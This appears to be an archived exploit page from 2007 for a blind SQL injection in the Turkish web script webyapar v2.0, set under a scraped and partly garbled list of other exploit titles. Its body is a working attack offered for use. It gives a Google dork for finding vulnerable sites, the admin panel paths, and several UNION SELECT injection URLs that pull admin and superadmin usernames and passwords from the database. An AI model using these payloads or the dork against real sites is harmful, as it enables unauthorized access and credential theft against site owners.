
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
81 lines
4.5 KiB
Text
Executable file
81 lines
4.5 KiB
Text
Executable file
#########################################################################################################################
|
|
#########################################################################################################################
|
|
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
|
|
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
|
|
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
|
|
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
|
|
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
|
|
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
|
|
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
|
|
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
|
|
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
|
|
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
|
|
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
|
|
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
|
|
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
|
|
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
|
|
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
|
|
#########################################################################################################################
|
|
#########################################################################################################################
|
|
##### TURKISH SECURİTY MAN AND C0D3R ####################### MAİL : dumanhack@gmail.com ###########################
|
|
##### - ##### web : ##########
|
|
##### PERFECT C0D3R AND SECURİTY ## >>>>>>>>>>>>>> MESSAGE : HAYAT İLLEGAL <<<<<<<<<<<<<<< ##
|
|
#########################################################################################################################
|
|
|
|
# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability
|
|
|
|
# AUTHOR: : bypass
|
|
|
|
# script name : Webyapar v2.0 { 700$ }
|
|
|
|
# Language : Tr
|
|
|
|
# scritp web page : www.webyapar.com
|
|
|
|
# script bug : remote sql enjeksiyon
|
|
|
|
# script admin panel1 : http://victim/script_path/yonetim
|
|
|
|
# script admin panel2 : http://victim/script_path/yonetim2
|
|
|
|
# google dork : inurl:"?page=duyurular_detay&id="
|
|
|
|
#Message Tr : ingilizcem pek iyi degildir. kodun piyasada satıs degeri 700$ - kodun sql dısında xss acıklarıda bulunmaktadır
|
|
ama pek fazla xss acıkları işinize yaramayacaktır. yonetim panelleri standart verilmistir...
|
|
|
|
# Message Tr : Hayat İllegal - / -
|
|
|
|
|
|
< / -------------------------------------------------------------------------------------------------------- />
|
|
|
|
|
|
< / ------ Example sql bug 1 admin username : ------ / >
|
|
|
|
|
|
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
|
|
|
|
|
|
|
|
|
|
< / ------ Example sql bug 1 admin password : ------ / >
|
|
|
|
|
|
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
|
|
|
|
|
|
|
|
|
|
< / ------ Example sql bug 2 superadmin password and admin username : ------ / >
|
|
|
|
|
|
|
|
http://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
|
|
|
|
< / -------------------------------------------------------------------------------------------------------- />
|
|
|
|
|
|
Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
|
|
|
|
Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
|
|
|
|
# milw0rm.com [2007-07-25]
|